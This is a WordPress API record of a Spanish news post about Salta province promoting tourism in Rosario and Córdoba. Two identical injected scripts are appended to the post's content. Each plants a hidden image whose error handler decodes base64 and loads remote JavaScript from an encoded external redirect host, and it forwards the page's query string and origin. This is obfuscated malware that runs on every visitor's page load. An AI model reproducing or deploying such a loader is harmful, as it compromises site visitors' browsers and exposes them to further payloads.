{"id":1367,"date":"2022-08-26T10:32:46","date_gmt":"2022-08-26T13:32:46","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1367"},"modified":"2025-08-14T00:37:28","modified_gmt":"2025-08-14T03:37:28","slug":"salta-afianza-vinculos-con-mercados-turisticos-estrategicos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1367","title":{"rendered":"Salta afianza v\u00ednculos con mercados tur\u00edsticos estrat\u00e9gicos"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#c91441\"><em>Se llev\u00f3 un workshop entre operadores salte\u00f1os y de Rosario de Santa Fe, adem\u00e1s de promoci\u00f3n dirigida al consumidor final. El martes pasado la delegaci\u00f3n provincial tambi\u00e9n estuvo en C\u00f3rdoba.<\/em><\/h4>\n\n\n\n<p>El posicionamiento de Salta como destino tur\u00edstico en mercados estrat\u00e9gicos se afianz\u00f3 esta semana con presentaciones y rondas de negocio que concret\u00f3 el Gobierno provincial junto a la C\u00e1mara de Turismo en Rosario de Santa Fe y C\u00f3rdoba.&nbsp;<br>&nbsp;<br>En las dos ciudades la presencia inici\u00f3 con acciones en la v\u00eda p\u00fablica en sectores urbanos de concurrencia, donde el stand promocional recibi\u00f3 numerosas consultas de potenciales turistas.<br>&nbsp;<br>En Rosario el Ministerio de Turismo y la C\u00e1mara recibieron a agencias locales en el marco de la ronda de comercializaci\u00f3n y ventas de productos tur\u00edsticos que impactar\u00e1n a mediano y largo plazo en m\u00e1s turistas recorriendo Salta.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3873-salta-afianza-vinculos-con-mercados-turisticos-estrategicos.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3873-salta-afianza-vinculos-con-mercados-turisticos-estrategicos.jpg\" alt=\"Salta afianza v\u00ednculos con mercados tur\u00edsticos estrat\u00e9gicos\"\/><\/a><\/figure>\n\n\n\n<p>\u201cEn Salta y en la actividad tur\u00edstica solamente sabemos trabajar de manera articulada y en red, agradezco al sector privado por traer diversidad de oferta\u00bb, se\u00f1al\u00f3 la secretaria de Turismo&nbsp;<strong>Nadia Loza&nbsp;<\/strong>quien remarc\u00f3 la visi\u00f3n del gobernador Gustavo S\u00e1enz y del ministro Mario Pe\u00f1a \u201cde mejorar la calidad de vida de los salte\u00f1os a trav\u00e9s del turismo\u00bb.<br>&nbsp;<br>La funcionaria destac\u00f3 lo que significa Rosario para el turismo receptivo provincial. \u201cSalta ha tenido este a\u00f1o indicadores hist\u00f3ricos y los turistas de esta provincia &nbsp;siempre estuvieron en los primeros lugares\u201d.<\/p>\n\n\n\n<p>El presidente de la C\u00e1mara de Turismo Gustavo Di M\u00e9cola coment\u00f3 al trade local que \u201cnuestro trabajo p\u00fablico-privado en Salta lleva muchos a\u00f1os, lo que nos deja grandes resultados\u00bb. Indic\u00f3 que \u201cson miles y miles los santafesinos que van a Salta y para esto la conectividad es clave\u201d y puso como ejemplo la conexi\u00f3n directa entre Salta y San Pablo.<br>\u00a0<br>Desde Rosario acompa\u00f1\u00f3 en el evento la subsecretaria de Turismo de la ciudad, Alejandra Mattheus, junto a referentes de c\u00e1maras y asociaciones privadas. Adem\u00e1s, la delegaci\u00f3n salte\u00f1a estuvo integrada por la subsecretaria de Promoci\u00f3n Laura Alcorta, por el presidente del Salta Convention Bureau, Daniel Astorga, el tesorero de la C\u00e1mara Hotelera, Gastron\u00f3mica y Afines, Mariano Garc\u00eda Cainzo, representantes de las c\u00e1maras \u00a0de San Lorenzo, Vaqueros y Chicoana y de los municipios San Lorenzo y Salta.\u00a0<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3874-salta-afianza-vinculos-con-mercados-turisticos-estrategicos.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Fuente:<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-afianza-vinculos-con-mercados-turisticos-estrategicos-84514\" target=\"_blank\" rel=\"noreferrer noopener\">\u00a0<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/a><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se llev\u00f3 un workshop entre operadores salte\u00f1os y de Rosario de Santa Fe, adem\u00e1s de promoci\u00f3n dirigida al consumidor final. El martes pasado la delegaci\u00f3n provincial tambi\u00e9n estuvo en C\u00f3rdoba. El posicionamiento de Salta como destino tur\u00edstico en mercados estrat\u00e9gicos se afianz\u00f3 esta semana con presentaciones y rondas de negocio que concret\u00f3 el Gobierno provincial [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1368,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,21],"tags":[],"class_list":{"0":"post-1367","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1367"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1367"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1367\/revisions"}],"predecessor-version":[{"id":7379,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1367\/revisions\/7379"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1368"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1367"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1367"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1367"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}